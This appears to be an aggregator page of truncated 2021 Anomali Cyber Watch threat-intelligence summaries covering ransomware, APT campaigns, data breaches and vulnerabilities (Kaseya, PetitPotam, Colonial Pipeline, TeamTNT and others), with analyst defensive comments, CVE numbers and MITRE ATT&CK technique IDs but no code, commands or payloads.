Analyst Comment: Organizations running Microsoft Exchange are strongly encouraged to prioritize updates to prevent ongoing exploitation of these vulnerabilities. In addition, a thorough investigation to discover and remove planted webshells should be undertaken as the patches will not remove planted webshells in their environments. A threat intelligence platform (TIP) such as Anomali Threatstream can be a valuable tool to assist organizations ingesting current indicators of compromise (IOCs) and determine whether their Exchange instances have been compromised.
MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Web Shell - T1100 | [MITRE ATT&CK] Hidden Files and Directories - T1158 | [MITRE ATT&CK] Source - T1153
Tags: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, Exchange, ProxyShell, backdoor
LockFile: Ransomware Uses PetitPotam Exploit to Compromise Windows Domain Controllers
(published: August 20, 2021)
A new ransomware family, named Lockfile by Symantec researchers, has been observed on the network of a US financial organization. The first known instance of this ransomware was July 20, 2021, and activity is ongoing. This ransomware has been seen largely targeting organizations in a wide range of industries across the US and Asia. The initial access vector remains unknown at this time, but the ransomware leverages the incompletely patched PetitPotam vulnerability (CVE-2021-36942) in Microsoft's Exchange Server to pivot to Domain Controllers (DCs) which are then leveraged to deploy ransomware tools to devices that connect to the DC. The attackers appear to remain resident on the network for several |
Ransomware Malware Tool Vulnerability Threat Patching Cloud | APT 37 | |
|
2021-08-17 17:56:00 | Anomali Cyber Watch: Anomali Cyber Watch: Aggah Using Compromised Websites to Target Businesses Across Asia, eCh0raix Targets Both QNAP and NAS, LockBit 2.0 Targeted Accenture, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: China, Critical Infrastructure, Data Storage, LockBit, Morse Code, Ransomware, and Vulnerabilities. . The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Colonial Pipeline Reports Data Breach After May Ransomware Attack
(published: August 16, 2021)
Colonial Pipeline, the largest fuel pipeline in the United States, is sending notification letters to 5,810 individuals affected by the data breach resulting from the DarkSide ransomware attack. During the incident, which occurred during May this year, DarkSide also stole roughly 100GB of files in about two hours. Right after the attack Colonial Pipeline took certain systems offline, temporarily halted all pipeline operations, and paid $4.4 million worth of cryptocurrency for a decryptor, most of it later recovered by the FBI. The DarkSide ransomware gang abruptly shut down their operation due to increased level of attention from governments, but later resurfaced under new name BlackMatter. Emsisoft CTO Fabian Wosar confirmed that both BlackMatter RSA and Salsa20 implementation including their usage of a custom matrix comes from DarkSide.
Analyst Comment: BlackMatter (ex DarkSide) group added "Oil and Gas industry (pipelines, oil refineries)" to their non-target list, but ransomware remains a significant threat given profitability and the growing number of ransomware threat actors with various levels of recklessness. Double-extortion schemes are adding data exposure to a company's risks. Stopping ransomware affiliates requires defense in depth including: patch management, enhancing your Endpoint Detection and Response (EDR) tools with ThreatStream, the threat intelligence platform (TIP), and utilizing data loss prevention systems (DLP).
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Darkside, BlackMatter, Colonial Pipeline, Oil and Gas, Ransomware, Salsa20, Data Breach, USA
Indra — Hackers Behind Recent Attacks on Iran
(published: August 14, 2021)
Check Point Research discovered that a July 2021 cyber attack against Iranian railway system was committed by Indra, a non-government group. The attackers had access to the targeted networks for a month and then deployed a previously unseen file wiper called Meteor effectively disrupting train service throughout the country. Previous versions of the Indra wiper named Stardust and Comet were seen in Syria, where Indra was attacking oil, airline, and financial sectors at least since 2019.
Analyst Comment: It is concerning that even non-government threat actors can damage a critical infrastructure in a large country. Similar to ransomware protection, with regards to wiper attacks organizations should improve their intrusion detection methods and have a resilient backup system.
MITRE ATT&CK: [MITRE ATT&CK] Data Destruction - T1485 | [MITRE ATT&CK] File Deletion - T1107 | |
Ransomware Data Breach Malware Hack Tool Vulnerability Threat Guideline | APT 27 APT 27 | |
|
2021-08-10 17:39:00 | Anomali Cyber Watch: GIGABYTE Hit By RansomEXX Ransomware, Seniors\' Data Exposed, FatalRat Analysis, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Chinese state hackers, Data leak, Ransomware, RAT, Botnets, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Actively Exploited Bug Bypasses Authentication On Millions Of Routers
(published: August 7, 2021)
The ongoing attacks were discovered by Juniper Threat Labs researchers exploiting recently discovered vulnerability CVE-2021-20090. This is a critical path traversal vulnerability in the web interfaces of routers with Arcadyan firmware that could allow unauthenticated remote attackers to bypass authentication. The total number of devices exposed to attacks likely reaches millions of routers. Researchers identified attacks originating from China and are deploying a variant of Mirai botnet on vulnerable routers.
Analyst Comment: Attackers have continuous and automated routines to look out for publicly accessible vulnerable routers and exploit them as soon as the exploit is made public. To reduce the attack surface, routers management console should only be accessible from specific public IP addresses. Also default password and other security policies should be changed to make it more secure.
Tags: CVE-2021-20090, Mirai, China
Computer Hardware Giant GIGABYTE Hit By RansomEXX Ransomware
(published: August 7, 2021)
The attack occurred late Tuesday night into Wednesday and forced the company to shut down its systems in Taiwan. The incident also affected multiple websites of the company, including its support site and portions of the Taiwanese website. Attackers have threatened to publish 112GB of stolen data which they claim to include documents under NDA (Non Disclosure Agreement) from companies including Intel, AMD, American Megatrends unless a ransom is paid.
Analyst Comment: At this point no official confirmation from GIGABYTE about the attack. Also no clarity yet on potential vulnerabilities or attack vectors used to carry out this attack.
Tags: RansomEXX, Defray, Ransomware, Taiwan
Millions of Senior Citizens' Personal Data Exposed By Misconfiguration
(published: August 6, 2021)
The researchers have discovered a misconfigured Amazon S3 bucket owned by the Senior Advisor website which hosts ratings and reviews for senior care services across the US and Canada. The bucket contained more than one million files and 182 GB of data containing names, emails, phone numbers of senior citizens from North America. This exposed data was not encrypted and did not require a password or login credentials to access.
Analyst Comment: Senior citizens are at high risk of online frauds. Their personal information and context regarding appointments getting leaked can lead to targeted phishing scams.
Tags: Data Leak, Phishing, North America, AWS
|
Malware Vulnerability Threat Guideline | APT 41 APT 41 APT 30 APT 27 APT 23 | |
|
2021-07-27 15:00:00 | Anomali Cyber Watch: APT31 Targeting French Home Routers, Multiple Microsoft Vulnerabilities, StrongPity Deploys Android Malware, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cryptojacking, Downloaders, Malspam, RATs, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Windows “PetitPotam” Network Attack – How to Protect Against It
(published: July 21, 2021)
Microsoft has released mitigations for a new Windows vulnerability called PetitPotam. Security researcher, Gillesl Lionel, created a proof-of-concept script that abuses Microsoft’s NT Lan Manager (NTLM) protocol called MS-EFSRPC (encrypting file system remote protocol). PetitPotam can only work if certain system functions that are enabled if the following conditions are met: NTLM authentication is enabled on domain, active directory certificate services (AD CS) is being used, certificate authority web enrollment or certificate enrollment we service are enabled. Exploitation can result in a NTLM relay attack, which is a type of man-in-the-middle attack.
Analyst Comment: Microsoft has provided mitigation steps to this attack which includes disabling NTLM on a potentially affected domain, in addition to others.
Tags: Vulnerability, Microsoft, PetitPotam, Man-in-the-middle
APT31 Modus Operandi Attack Campaign Targeting France
(published: July 21, 2021)
The French cybersecurity watchdog, ANSSII issued an alert via France computer emergency response team (CERT) discussing attacks targeting multiple French entities. The China-sponsored, advanced persistent threat (APT) group APT31 (Judgment Panda, Zirconium) has been attributed to this ongoing activity. The group was observed using “a network of compromised home routers as operational relay boxes in order to perform stealth reconnaissance as well as attacks.”
Analyst Comment: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place.
MITRE ATT&CK: [MITRE ATT&CK] Resource Hijacking - T1496
Tags: APT, APT31, Judgment Panda, Zirconium, Home routers
StrongPity APT Group Deploys Android Malware for the First Time
(published: July 21, 2021)
Trend Micro researchers conducted analysis on a malicious APK sample shared on Twitter by MalwareHunterTeam. The shared sample was discussed as being a trojanized version of an Android app offered on the authentic Syrian E-Gov website, potentially via a watering-hole attack. Researchers took this information and pivoted further to analyze the backdoor functionality of the trojanized app (which is no longer being distributed on the official Syrian E-Gov website). Additional samples were identified to be contacting URLs that are identical to or following previous r |
Malware Tool Vulnerability Threat | Uber APT 31 | |
|
2021-07-20 15:00:00 | Anomali Cyber Watch: China Blamed for Microsoft Exchange Attacks, Israeli Cyber Surveillance Companies Help Oppressive Governments, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: China, APT, Espionage, Ransomware, Targeted Campaigns, DLL Side-Loading, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
UK and Allies Accuse China for a Pervasive Pattern of Hacking, Breaching Microsoft Exchange Servers
(published: July 19, 2021)
On July 19th, 2021, the US, the UK, and other global allies jointly accused China in a pattern of aggressive malicious cyber activity. First, they confirmed that Chinese state-backed actors (previously identified under the group name Hafnium) were responsible for gaining access to computer networks around the world via Microsoft Exchange servers. The attacks took place in early 2021, affecting over a quarter of a million servers worldwide. Additionally, APT31 (Judgement Panda) and APT40 (Kryptonite Panda) were attributed to Chinese Ministry of State Security (MSS), The US Department of Justice (DoJ) has indicted four APT40 members, and the Cybersecurity and Infrastructure Security Agency (CISA) shared indicators of compromise of the historic APT40 activity.
Analyst Comment: Network defense-in-depth and adherence to information security best practices can assist organizations in reducing the risk. Pay special attention to the patch and vulnerability management, protecting credentials, and continuing network hygiene and monitoring. When possible, enforce the principle of least privilege, use segmentation and strict access control measures for critical data. Organisations can use Anomali Match to perform real time forensic analysis for tracking such attacks.
MITRE ATT&CK: [MITRE ATT&CK] Drive-by Compromise - T1189 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Server Software Component - T1505 | [MITRE ATT&CK] Exploitation of Remote Services - T1210
Tags: Hafnium, Judgement Panda, APT31, TEMP.Jumper, APT40, Kryptonite Panda, Zirconium, Leviathan, TEMP.Periscope, Microsoft Exchange, CVE-2021-26857, CVE-2021-26855, CVE-2021-27065, CVE-2021-26858, Government, EU, UK, North America, China
NSO’s Spyware Sold to Authoritarian Regimes Used to Target Activists, Politicians and Journalists
(published: July 18, 2021)
Israeli surveillance company NSO Group supposedly sells spyware to vetted governments bodies to fight crime and terrorism. New research discovered NSO’s tools being used against non-criminal actors, pro-democracy activists and journalists investigating corruption, political opponents and government critics, diplomats, etc. In some cases, the timeline of this surveillance coincided with journalists' arrests and even murders. The main penetration tool used by NSO is malware Pegasus that targets both iPho |
Ransomware Malware Tool Vulnerability Threat Studies Guideline Industrial | APT 41 APT 40 APT 28 APT 31 | |
|
2021-07-06 15:05:00 | Anomali Cyber Watch: Thousands attacked as REvil ransomware hijacks Kaseya VSA, Leaked Babuk Locker Ransomware Builder Used In New Attacks and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Babuk, IndigoZebra, Ransomware, REvil, Skimmer, Zero-day and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Shutdown Kaseya VSA Servers Now Amidst Cascading REvil Attack Against MSPs, Clients
(published: July 4, 2021)
A severe ransomware attack reportedly took place against the popular remote monitoring and management (RMM) software tool Kaseya VSA. On July 2, 2021, Kaseya urged users to shut down their VSA servers to prevent them from being compromised. The company estimated that fewer than 40 of their customers worldwide were affected, but as some of them were managed service providers (MSPs), over 1,000 businesses were infected. The majority of known victims are in the US with some in Europe (Sweden) and New Zealand. The attackers exploited a zero-day vulnerability in Kaseya’s systems that the company was in the process of fixing. It was part of the administrative interface vulnerabilities in tools for system administration previously identified by Wietse Boonstra, a DIVD researcher. The REvil payload was delivered via Kaseya software using a custom dropper that dropped two files. A dropper opens an old but legitimate copy of Windows Defender (MsMpEng.exe) that then side loads and executes the custom malicious loader's export. The attack coincided with the start of the US Independence Day weekend, and has several politically-charged strings, such as “BlackLivesMatter” Windows registry key and “DTrump4ever” as a password.
Analyst Comment: Kaseya VSA clients should safely follow the company’s recommendations as it advised shutting Kaseya VSA servers down, and is making new security updates available. Every organization should have a ransomware disaster recovery plan even if it is serviced by a managed service provider (MSP).
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Supply Chain Compromise - T1195 | [MITRE ATT&CK] DLL Side-Loading - T1073
Tags: REvil, Sodinokibi, Gandcrab, Leafroller, Kaseya VSA, ransomware, Ransomware-as-a- Service, zero-day, CVE-2021-30116, supply-chain, North America, USA, Sweden, New Zealand, MSP, RMM, schools
IndigoZebra APT Continues To Attack Central Asia With Evolving Tools
(published: July 1, 2021)
Researchers from Check Point have identified the Afghan Government as the latest victim in a cyber espionage campaign by the suspected Chinese group ‘IndigoZebra’. This attack began in April when Afghan National Security Council (NSC) officials began to receive lure emails claiming to be from the President’s secretariat. These emails included a decoy file that would install the backdoor ‘BoxCaon’ on the system before reaching out to the Dropbox API to act as a C&C server. The attacker would then be able to fingerprint the machine and begin accessing files. I |
Ransomware Spam Malware Tool Vulnerability Threat Guideline | APT 19 APT 10 | |
|
2021-06-29 16:29:00 | Anomali Cyber Watch: Microsoft Signs Malicious Netfilter Rootkit, Ransomware Attackers Using VMs, Fertility Clinic Hit With Data Breach and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: China, NetFilter, Ransomware, QBot, Wizard Spider, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Microsoft Signed a Malicious Netfilter Rootkit
(published: June 25, 2021)
Security researchers recently discovered a malicious netfilter driver that is signed by a valid Microsoft signing certificate. The files were initially thought to be a false positive due to the valid signing, but further inspection revealed that the malicious driver called out to a Chinese IP. Further research has analyzed the malware, dropper, and Command and Control (C2) commands. Microsoft is still investigating this incident, but has clarified that they did approve the signing of the driver.
Analyst Comment: Malware signed by a trusted source is a threat vector that can be easily missed, as organizations may be tempted to not inspect files from a trusted source. It is important for organizations to have network monitoring as part of their defenses. Additionally, the signing certificate used was quite old, so review and/or expiration of old certificates could prevent this malware from running.
MITRE ATT&CK: [MITRE ATT&CK] Code Signing - T1116 | [MITRE ATT&CK] Install Root Certificate - T1130
Tags: Netfilter, China
Dell BIOSConnect Flaws Affect 30 Million Devices
(published: June 24, 2021)
Four vulnerabilities have been identified in the BIOSConnect tool distributed by Dell as part of SupportAssist. The core vulnerability is due to insecure/faulty handling of TLS, specifically accepting any valid wildcard certificate. The flaws in this software affect over 30 million Dell devices across 128 models, and could be used for Remote Code Execution (RCE). Dell has released patches for these vulnerabilities and currently there are no known actors scanning or exploiting these flaws.
Analyst Comment: Any business or customer using Dell hardware should patch this vulnerability to prevent malicious actors from being able to exploit it. The good news is that Dell has addressed the issue. Patch management and asset inventories are critical portions of a good defense in depth security program.
MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Exploitation for Privilege Escalation - T1068 | [MITRE ATT&CK] Peripheral Device Discovery - T1120
Tags: CVE-2021-21571, CVE-2021-21572, CVE-2021-21573, CVE-2021-21574, Dell, BIOSConnect
Malicious Spam Campaigns Delivering Banking Trojans
(published: June 24, 2021)
Analysis from two mid-March 2021 spam campaignts revealed that th |
Ransomware Data Breach Spam Malware Tool Vulnerability Threat Patching | APT 30 | |
|
2021-06-22 18:18:00 | Anomali Cyber Watch: Klingon RAT Holding on for Dear Life, CVS Medical Records Breach, Black Kingdom Ransomware and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Black Kingdom, Darkside, Go, Klingon Rat, Microsoft PowerApps, Ransomware and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Andariel Evolves to Target South Korea with Ransomware
(published: June 15, 2021)
Researchers at securelist identified ransomware attacks from Andariel, a sub-group of Lazarus targeting South Korea. Attack victims included entities from manufacturing, home network service, media and construction sectors. These attacks involved malicious Microsoft Word documents containing a macro and used novel techniques to implant a multi-stage payload. The final payload was a ransomware custom made for this specific attack.
Analyst Comment: Users should be wary of documents that request Macros to be enabled. All employees should be educated on the risk of opening attachments from unknown senders. Anti-spam and antivirus protections should be implemented and kept up-to-date with the latest version to better ensure security.
MITRE ATT&CK: [MITRE ATT&CK] System Network Connections Discovery - T1049 | [MITRE ATT&CK] Process Discovery - T1057 | [MITRE ATT&CK] Screen Capture - T1113 | [MITRE ATT&CK] Standard Non-Application Layer Protocol - T1095 | [MITRE ATT&CK] Exfiltration Over Command and Control Channel - T1041 | [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Lazarus group, Lazarus, Andariel, Hidden Cobra, tasklist, Manuscrypt, Banking And Finance, Malicious documents, Macros
Matanbuchus: Malware-as-a-Service with Demonic Intentions
(published: June 15, 2021)
In February 2021, BelialDemon advertised a new malware-as-a-service (MaaS) called Matanbuchus Loader and charged an initial rental price of $2,500. Malware loaders are malicious software that typically drop or pull down second-stage malware from command and control (C2) infrastructures.
Analyst Comment: Malware as a Service (MaaS) is a relatively new development, which opens the doors of crime to anyone with the money to pay for access. A criminal organization that wants to carry out a malware attack on a target no longer requires in-house technical expertise or infrastructure. Such attacks in most cases share tactics, techniques, and even IOCs. This highlights the importance of intelligence sharing for proactive protection.
MITRE ATT&CK: [MITRE ATT&CK] System Network Configuration Discovery - T1016
Tags: BelialDemon, Matanbuchus, Belial, WildFire, EU, North America
Black Kingdom ransomware
(published: June 17 |
Ransomware Data Breach Malware Vulnerability Threat Medical | APT 38 APT 28 | |
|
2021-06-15 16:05:00 | Anomali Cyber Watch: TeamTNT Expand Its Cryptojacking Footprint, PuzzleMaker Attack with Chrome Zero-day, NoxPlayer Supply-Chain Attack Likely The Work of Gelsemium Hackers and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics:BackdoorDiplomacy, Gelsemium, Gootkit, Siloscape, TeamTNT, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
NoxPlayer Supply-Chain Attack is Likely The Work of Gelsemium Hackers
(published: June 14, 2021)
ESET researchers have discovered malicious activity dating back to at least 2014 attributed to the Gelsemium cyberespionage group. The group targets electronics manufacturers, governments, religious entities in multiple countries throughout East Asia and the Middle East. Gelsemium demonstrated sophistication in their infection chain with extensive configurations, multiple implants at each stage, and modifying settings on-the-fly for delivering the final payload. The dropper, called Gelsemine, will drop a loader called Gelsenicine that will deliver the final payload, called Gelsevirine.
Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. Therefore, it will be easier to spot unusual traffic and connections to and from your network to potentially identify malicious activity. Furthermore, ensure that your employees are educated about the risks of opening attachments, particularly from unknown senders and any attachment that requests macros be enabled.
MITRE ATT&CK: [MITRE ATT&CK] Remote Access Tools - T1219 | [MITRE ATT&CK] Obfuscated Files or Information - T1027
Tags: Cyberespionage, Gelsemium, Supply Chain
BackdoorDiplomacy: upgrading from Quarian to Turian
(published: June 10, 2021)
A new advanced persistent threat (APT) group, dubbed BackdoorDiplomacy, has been targeting ministries of foreign affairs (MOFAs) and telecommunication companies located in Africa and the Middle East since at least 2017, according to ESET researchers. The group was observed targeting “vulnerable internet-exposed devices such as web servers and management interfaces for networking equipment.” BackdoorDiplomacy’s objective is to access a system, use pentesting tools for lateral movement, and install a custom backdoor called “Turian,” which is based on the Quarian backdoor.
Analyst Comment: It is important that your company has patch-maintenance policies in place, particularly if there are numerous internet-facing services your company uses or provides. Once a vulnerability has been reported on in open sources, threat actors will likely attempt to incorporate the exploitation of the vulnerability into their malicious operations. Patches should be reviewed and applied as soon as possible to prevent potential malicious activity.
MITRE ATT&CK: |
Ransomware Malware Vulnerability Threat | Uber | |
|
2021-06-08 15:00:00 | Anomali Cyber Watch: TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations, Necro Python Bots Adds New Tricks, US Seizes Domains Used by APT29 and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, APT29, FluBot, Necro Python, RoyalRoad, SharpPanda, TeaBot and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations
(published: June 4, 2021)
Researchers at Palo Alto have identified a malware repo belonging to TeamTNT, the prominent cloud focused threat group. The repo shows the expansion of TeamTNTs abilities, and includes scripts for scraping SSH keys, AWS IAM credentials and searching for config files that contain credentials. In addition to AWS credentials, TeamTNT are now also searching for Google Cloud credentials, which is the first instance of the group expanding to GCP.
Analyst Comment: Any internal only cloud assets & SSH/Privileged access for customer facing cloud infrastructure should only be accessible via company VPN. This ensures attackers don’t get any admin access from over the internet even if keys or credentials are compromised. Customers should monitor compromised credentials in public leaks & reset the passwords immediately for those accounts.
MITRE ATT&CK: [MITRE ATT&CK] Permission Groups Discovery - T1069
Tags: AWS, Cloud, Credential Harvesting, cryptojacking, Google Cloud, IAM, scraping, TeamTnT, Black-T, Peirates
Necro Python Bots Adds New Tricks
(published: June 3, 2021)
Researchers at Talos have identified updated functionality in the Necro Python bot. The core functionality is the same with a focus on Monero mining, however exploits to the latest vulnerabilities have been added. The main payloads are XMRig, traffic sniffing and DDoS attacks. Targeting small and home office routers, the bot uses python to support multiple platforms.
Analyst Comment: Users should ensure they always apply the latest patches as the bot is looking to exploit unpatched vulnerabilities. Users need to change default passwords for home routers to ensure potential malware on your personal devices don’t spread to your corporate devices through router takeover.
MITRE ATT&CK: [MITRE ATT&CK] Scripting - T1064 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Remote Access Tools - T1219
Tags: Bot, botnet, Exploit, Monero, Necro Python, Python, Vulnerabilities, XMRig
New SkinnyBoy Ma |
Ransomware Malware Vulnerability Threat Patching Guideline | APT 29 APT 28 | |
|
2021-05-25 15:00:00 | Anomali Cyber Watch: Bizzaro Trojan Expands to Europe, Fake Call Centers Help Spread BazarLoader Malware, Toshiba Business Reportedly Hit by DarkSide Ransomware and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: BazarCall, DarkSide, Data breach, Malware, Phishing, Ransomware and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Air India passenger data breach reveals SITA hack worse than first thought
(published: May 23, 2021)
Adding to the growing body of knowledge related to the March 2021 breach of SITA, a multinational information technology company providing IT and telecommunication services to the air transport industry, Air India announced over the weekend that the personal information of 4.5 million customers was compromised. According to the airline, the stolen information included passengers’ name, credit card details, date of birth, contact information, passport information, ticket information, Star Alliance and Air India frequent flyer data. The compromise included data for passengers who registered with Indian Airlines between 26 August 2011 and 3 February 2021; nearly a decade. Air India adds to the growing list of SITA clients impacted by their data breach, including Malaysia Airlines, Finnair, Singapore Airlines, Jeju Air, Cathay Pacific, Air New Zealand, and Lufthansa.
Analyst Comment: Unfortunately, breaches like this are commonplace. While customers have no control over their information being included in such a breach, they can and should take appropriate actions once notified they may be impacted, Those actions can include changing passwords and credit cards associated with the breached accounts, engaging with credit reporting agencies for enhanced credit monitoring or freezing of credit inquiries without permission, and reaching out to companies that have reportedly been breached to learn what protections they may be offering their clients.
Tags: Data Breach, Airline, PII
BazarCall: Call Centers Help Spread BazarLoader Malware
(published: May 19, 2021)
Researchers from PaloAlto’s Unit42 released a breakdown of a new infection method for the BazarLoader malware. Once installed, BazarLoader provides backdoor access to an infected Windows host which criminals can use to scan the environment, send follow-up malware, and exploit other vulnerable hosts on the network. In early February 2021, researchers began to report a “call center” method of distributing BazarLoader. Actors would send phishing emails with trial subscription-based themes encouraging victims to phone a number to unsubscribe. If a victim called, the actor would answer the phone and direct the victim through a process to infect the computer with BazarLoader. Analysts dubbed this method of infection “BazarCall.”
Analyst Comment: This exemplifies social engineering tactics threat actors employ to trick users into installing malware on their machines. All social media users should be cautious when accepting unknown requests to connect, and particularly cautious when receiving communication from unknown users. Even if cal |
Ransomware Data Breach Malware Hack Tool Vulnerability Threat Guideline | ||
|
2021-05-18 19:05:00 | Anomali Cyber Watch: Microsoft Azure Vulnerability Discovered, MSBuild Used to Deliver Malware, Esclation of Avaddon Ransomware and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Android, Malware, Ransomware, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Cross-Browser Tracking Vulnerability Tracks You Via Installed Apps
(published: May 14, 2021)
A new method of fingerprinting users has been developed using any browser. Using URL schemes, certain applications can be launched from the browser. With this knowledge, an attacker can flood a client with multiple URL schemes to determine installed applications and create a fingerprint. Google Chrome has certain protections against this attack, but a workaround exists when using the built-in PDF viewer; this resets a flag used for flood protection. The only known protection against scheme flooding is to use browsers across multiple devices.
Analyst Comment: It is critical that the latest security patches be applied as soon as possible to the web browser used by your company. Vulnerabilities are discovered relatively frequently, and it is paramount to install the security patches because the vulnerabilities are often posted to open sources where any malicious actor could attempt to mimic the techniques that are described.
Tags: Scheme Flooding, Vulnerability, Chrome, Firefox, Edge
Threat Actors Use MSBuild to Deliver RATs Filelessly
(published: May 13, 2021)
Anomali Threat Research have identified a campaign in which threat actors are using MSBuild project files to deliver malware. The project files contain a payload, either Remcos RAT, RedLine, or QuasarRAT, with shellcode used to inject that payload into memory. Using this technique the malware is delivered filelessly, allowing the malware to evade detection.
Analyst Comment: Threat actors are always looking for new ways to evade detection. Users should make use of a runtime protection solution that can detect memory based attacks.
MITRE ATT&CK: [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Trusted Developer Utilities - T1127 | [MITRE ATT&CK] Steal Web Session Cookie - T1539 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Account Discovery - T1087 | [MITRE ATT&CK] File and Directory Discovery - T1083 | |
Ransomware Malware Vulnerability Threat Guideline | APT 36 | |
|
2021-05-04 15:25:00 | Anomali Cyber Watch: Microsoft Office SharePoint Servers Targeted with Ransomware, New Commodity Crypto-Stealer and RAT, Linux Backdoor Targeting Users for Years, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Data Theft, Backdoor, Ransomware, Targeted Ransomware Attacks and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Python Also Impacted by Critical IP Address Validation Vulnerability
(published: May 1, 2021)
Researchers have recently discovered that a bug previously discovered in netmask (a tool to assist with IP address scoping) is also present in recent versions of Python 3. The bug involves the handling of leading zeroes in decimal represented IP addresses. Instead of interpreting these as octal notation as specified in the standard, the python ipaddress library strips these and interprets the initial zero and interprets the rest as a decimal. This could allow unauthenticated remote attackers to perform a number of attacks against programs that rely on python's stdlib ipdaddress library, including Server-Side Request Forgery (SSRF), Remote File Inclusion (RFI), and Local File Inclusion (LFI).
Analyst Comment: Best practices for developers include input validation and sanitization, which in this case would avoid this bug by validating or rejecting IP addresses. Additionally regular patch and update schedules will allow for rapid addressing of bugs as they are discovered and patches delivered. Proper network monitoring and policies are also an important part of protecting against these types of attacks.
Tags: CVE-2021-29921, python
Codecov Begins Notifying Affected Customers, Discloses IOCs
(published: April 30, 2021)
Codecov has disclosed multiple IP addresses as IOCs that were used by the threat actors to collect sensitive information (environment variables) from the affected customers. The company disclosed a supply-chain breach on April 15, 2021, and has now begun notifying customers. The breach went undiscovered for 2 months, and leveraged the Codecov Bash Uploader scripts used by a large number of projects.
